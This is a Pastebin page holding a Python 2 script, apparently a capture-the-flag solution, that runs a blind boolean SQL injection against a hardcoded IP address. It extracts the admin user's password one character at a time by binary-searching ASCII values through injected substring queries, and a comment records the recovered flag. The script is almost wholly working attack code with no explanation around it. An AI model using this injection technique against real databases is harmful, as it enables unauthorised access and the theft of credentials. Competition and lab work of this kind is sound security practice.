Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import base64
- import math
- import requests
- def make_request(sqlstr):
- return requests.post('http://128.199.224.175:24000', data = {'spy_name':base64.b64encode(sqlstr)})
- def check_request(sqlstr):
- r = make_request(sqlstr)
- if r.content.find('Are commanded him convinced dashwoods did estimable') == -1:
- return False
- return True
- def build_injection(index, comparison):
- part1 = "%' and ascii(substring((select password from users where username = 'admin'),"
- part2 = ",1))"
- part3 = " limit 1#"
- return part1 + str(index) + part2 + comparison + part3
- # This is not bruteforce! It's actually educated guess
- # Also we are being fair game and being gentle on server
- def guess(index, low, high):
- if high - low == 1:
- if check_request(build_injection(index, '=' + str(low))):
- return low
- elif check_request(build_injection(index, '=' + str(high))):
- return high
- else:
- raise Exception()
- middle = int(math.floor((low + high) / 2))
- if check_request(build_injection(index, '<' + str(middle))):
- print '#', index, ': ', low, ' - ', middle
- return guess(index, low, middle)
- else:
- print '#', index, ': ', middle, ' - ', high
- return guess(index, middle, high)
- # key = "pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}"
- key = 'pctf{'
- length = 40 # pctf{L31___________________________}
- for i in xrange(len(key) + 1,length):
- try:
- key += chr(guess(i, 32, 127))
- except Exception as e:
- print key
- raw_input()
- print key
- print key
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement